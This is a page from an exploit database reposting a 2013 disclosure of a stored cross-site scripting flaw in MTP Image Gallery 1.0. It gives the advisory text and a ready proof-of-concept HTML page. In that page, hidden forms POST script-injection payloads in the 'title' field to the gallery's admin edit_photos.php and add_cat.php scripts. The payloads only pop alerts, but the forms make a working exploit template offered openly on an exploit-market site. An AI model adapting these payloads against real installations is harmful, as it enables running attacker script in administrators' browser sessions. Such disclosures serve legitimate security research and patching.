[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MTP Image Gallery 1.0 XSS Vulnerability

Author
LiquidWorm
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20443
Category
web applications
Date add
26-02-2013
Platform
php
<!--
 
MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability
 
 
Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0
 
Summary: MTP Image Gallery offers more control, better
uploading and enhanced performance. With MTP Image Gallery
you can easily create and maintain albums of photos via an
intuitive, web interface.
 
Desc: MTP Image Gallery suffers from a stored XSS vulnerability
when parsing user input to the 'title' parameter via POST method
thru 'edit_photos.php' and 'add_cat.php' scripts. Attackers can
exploit this weakness to execute arbitrary HTML and script code
in a user's browser session.
 
Tested on: Linux, Apache2
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
 
Advisory ID: ZSL-2013-5130
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5130.php
 
 
17.02.2013
 
-->
 
<html>
<head>
<title>MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability</title>
</head>
<body><center>
<form method="POST" action="http://localhost/gallery/admin/edit_photos.php?ID=39&action=edit">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="Filedata" value="" />
<input type="hidden" name="cats" value="12" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="full" value="1" />
<input type="hidden" name="views" value="1" />
<input type="hidden" name="rating" value="1" />
<input type="hidden" name="author" value="lqwrm" />
<input type="hidden" name="action" value="add" />
<input type="submit" value="XSS #1" />
</form>
<br /><br />
<form method="POST" action="http://localhost/gallery/admin/add_cat.php">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="cats" value="1" />
<input type="hidden" name="full" value="1" />
<input type="hidden" name="title" value='"><script>alert(2);</script>' />
<input type="submit" value="XSS #2" />
</form>
</center></body>
</html>

#  0day.today [2024-12-25]  #